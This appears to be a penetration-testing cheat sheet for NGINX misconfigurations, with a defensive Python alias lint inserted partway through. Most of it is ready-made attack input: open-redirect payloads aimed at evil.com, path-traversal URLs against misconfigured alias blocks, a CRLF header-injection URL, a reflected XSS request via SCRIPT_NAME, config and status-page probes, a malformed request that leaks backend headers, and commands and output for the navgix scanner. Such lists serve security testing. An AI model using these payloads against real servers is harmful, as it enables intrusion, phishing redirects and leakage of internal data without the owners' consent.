Configuration file
GET /nginx.conf
GET /nginx/nginx.conf
Open Redirect
https://example.com/%5cevil.com
https://example.com////\;@evil.com
https://example.com////evil.com
https://example.com///evil.com
https://example.com///evil.com/%2f%2e%2e
https://example.com///evil.com@//
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
https://example.com//;@evil.com
https://example.com//\/evil.com/
https://example.com//\@evil.com
https://example.com//\evil.com
https://example.com//\tevil.com/
https://example.com//evil.com/%2F..
https://example.com//evil.com//
https://example.com//evil.com@//
https://example.com//evil.com\tevil.com/
https://example.com//https://evil.com@//
https://example.com/<>//evil.com
https://example.com/\/\/evil.com/
https://example.com/\/evil.com
https://example.com/\evil.com
https://example.com/evil.com
https://example.com/evil.com/%2F..
https://example.com/evil.com/
https://example.com/evil.com/..;/css
https://example.com/https:evil.com
Path traversal via misconfigured NGINX alias
https://example.com/static../ returns the same response as https://example.com/
https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css
https://example.com/folder1/folder2../folder2/static/main.css
https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css
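As an added defender-side check, not part of the original page: a small Python lint that flags the location/alias combination behind the /static../ traversal above (a prefix location without a trailing slash whose alias ends in one). The function name and the sample configurations are constructed for this example.

```python
import re

# "location [modifier] <prefix> {" -- modifier is =, ~, ~* or ^~ (None for a plain prefix match)
LOCATION_RE = re.compile(r'^\s*location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{')
ALIAS_RE = re.compile(r'^\s*alias\s+(\S+?)\s*;')

def find_alias_traversal(conf_text):
    """Return (location_line, prefix, alias) for every prefix-match location
    without a trailing slash that aliases a directory with one: NGINX swaps
    the matched prefix for the alias, so <prefix>../ maps to <alias>../ on disk."""
    findings = []
    depth = 0
    loc = None  # (line_no, modifier, prefix, brace depth when the block opened)
    for line_no, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split('#', 1)[0]          # drop trailing comments before matching
        m = LOCATION_RE.match(line)
        if m:
            loc = (line_no, m.group(1), m.group(2), depth)
        elif loc is not None:
            a = ALIAS_RE.match(line)
            if a:
                _, modifier, prefix, _ = loc
                # Exact (=) and regex (~, ~*) locations are not rewritten prefix-for-alias.
                if (modifier in (None, '^~') and not prefix.endswith('/')
                        and a.group(1).endswith('/')):
                    findings.append((loc[0], prefix, a.group(1)))
        depth += line.count('{') - line.count('}')
        if loc is not None and depth <= loc[3]:
            loc = None                        # left the location block
    return findings

# Constructed sample configs (not from the page): the weak block and its fix.
VULNERABLE_CONF = """server {
    location /static {
        alias /var/www/app/static/;   # /static../ -> /var/www/app/static/../
    }
}
"""
FIXED_CONF = """server {
    location /static/ {               # trailing slash: /static../ no longer matches
        alias /var/www/app/static/;
    }
}
"""

if __name__ == "__main__":
    print("vulnerable:", find_alias_traversal(VULNERABLE_CONF))  # [(2, '/static', '/var/www/app/static/')]
    print("fixed:     ", find_alias_traversal(FIXED_CONF))       # []
```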
http://server/api/user -> http://apiserver/v1//user
http://server/apiuser -> http://apiserver/v1/user
Tools
go get github.com/PuerkitoBio/goquery
go get github.com/cristalhq/acmd
go build
./navgix scan -u http://url.com
Burp extension
SCRIPT_NAME
GET /index.php/<script>alert(1)</script>/index.php
Status page
https://example.com/nginx_status
CRLF
http://localhost/%0d%0aDetectify:%20clrf
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: https://example.com/
Detectify: clrf
Any variable
$ curl -H 'Referer: bar' http://localhost/foo$http_referer | grep 'foobar'
Raw backend response reading
Send an invalid HTTP request, such as:
GET /? XTTP/1.1
Host: 127.0.0.1
Connection: close
We will get the following response:
XTTP/1.1 500 Error
Content-Type: text/html
Secret-Header: secret-info
Secret info, should not be visible!
merge_slashes
The merge_slashes directive is set to "on" by default; it compresses two or more consecutive forward slashes into one, so /// becomes /. If NGINX is used as a reverse proxy and the proxied application is vulnerable to local file inclusion, extra slashes in the request could leave room to exploit it.
Tools
./navgix scan -u http://vulnerable.com/
[navgix 2024-12-23_02:12:17.731403583] starting scan on http://vulnerable.com/
[navgix 2024-12-23_02:12:17.830559043] Vulnerable: http://vulnerable.com/assets../
[navgix 2024-12-23_02:12:17.926859226] Vulnerable: http://vulnerable.com/assets../
Resources